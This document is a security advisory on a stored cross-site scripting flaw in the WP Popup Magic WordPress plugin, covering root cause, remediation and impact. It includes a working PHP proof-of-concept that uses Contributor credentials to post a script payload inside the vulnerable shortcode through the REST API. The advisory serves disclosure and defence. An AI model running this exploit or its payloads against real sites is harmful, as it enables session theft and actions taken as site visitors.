Atomic Edge analysis of CVE-2025-13900 (metadata-based):
This vulnerability is an authenticated stored cross-site scripting (XSS) flaw in the WP Popup Magic WordPress plugin. The vulnerability exists within the ‘name’ attribute of the [wppum_end] shortcode. Attackers with Contributor-level permissions or higher can inject malicious scripts into posts or pages. These scripts execute in the browsers of users who view the compromised content.
Atomic Edge research infers the root cause is insufficient input sanitization and output escaping, as indicated by the CWE-79 classification. The plugin likely fails to properly sanitize user-supplied input to the ‘name’ shortcode attribute before storing it in the database. It also fails to escape this data when it is output on the front-end. These conclusions are inferred from the CWE and vulnerability description, as source code confirmation is unavailable.
Exploitation requires an authenticated user with at least the Contributor role. The attacker would edit or create a post or page and insert the vulnerable shortcode with a malicious ‘name’ attribute payload. For example: [wppum_end name=”alert(‘XSS’)”] The payload is stored with the post content. The plugin’s output routine then unsafely renders this attribute value without escaping, causing script execution for any visitor viewing the page.
Remediation requires implementing proper input validation and output escaping. The plugin should sanitize the ‘name’ attribute value upon input using functions like `sanitize_text_field()`. It must also escape the value on output using functions like `esc_attr()` before printing it within an HTML attribute context. A secure coding approach would validate the input against an allow-list of expected characters.
Successful exploitation leads to stored XSS. Attackers can steal session cookies, perform actions as the victim user, deface websites, or redirect users to malicious sites. The CVSS vector indicates a scope change (S:C), meaning the impact can spread to other site components or user sessions. This vulnerability does not directly lead to remote code execution or server compromise.
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-13900 - WP Popup Magic <= 1.0.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'name' Shortcode Attribute
<?php
/**
* Proof of Concept for CVE-2025-13900.
* This script simulates an authenticated Contributor user injecting a stored XSS payload
* via the 'name' attribute of the [wppum_end] shortcode.
* Assumptions:
* 1. The target site has WP Popup Magic plugin version <= 1.0.0 installed.
* 2. Valid Contributor-level credentials are available.
* 3. The WordPress REST API is available for authentication and post creation.
*/
$target_url = 'https://target-site.com'; // CONFIGURE THIS
$username = 'contributor_user'; // CONFIGURE THIS
$password = 'contributor_pass'; // CONFIGURE THIS
// Payload to inject into the shortcode's 'name' attribute.
// This is a simple alert for demonstration. A real attack might use a more malicious script.
$xss_payload = '<script>alert(document.domain)</script>';
// Step 1: Authenticate via the WordPress REST API to obtain a nonce or JWT.
// This example uses the Application Password method (WordPress 5.6+).
$auth = base64_encode($username . ':' . $password);
// Step 2: Create a new post with the malicious shortcode.
$post_data = [
'title' => 'Test Post with XSS',
'content' => 'This post contains the vulnerable shortcode. Shortcode: [wppum_end name="' . $xss_payload . '"]',
'status' => 'pending' // Contributor role can create pending posts.
];
$ch = curl_init();
curl_setopt_array($ch, [
CURLOPT_URL => $target_url . '/wp-json/wp/v2/posts',
CURLOPT_RETURNTRANSFER => true,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => json_encode($post_data),
CURLOPT_HTTPHEADER => [
'Authorization: Basic ' . $auth,
'Content-Type: application/json',
'Accept: application/json'
]
]);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if ($http_code >= 200 && $http_code < 300) {
$resp_data = json_decode($response, true);
$post_id = $resp_data['id'] ?? 'unknown';
$post_link = $resp_data['link'] ?? 'unknown';
echo "[+] Post created successfully (ID: $post_id).n";
echo "[+] Visit the post to trigger the XSS: $post_linkn";
echo "[+] Payload injected: $xss_payloadn";
} else {
echo "[-] Failed to create post. HTTP Code: $http_coden";
echo "[-] Response: $responsen";
// Fallback assumption: If REST API fails, the attack would be performed via the standard WordPress editor UI.
echo "[-] Manual exploitation via the WordPress post editor is still possible.n";
}
?>
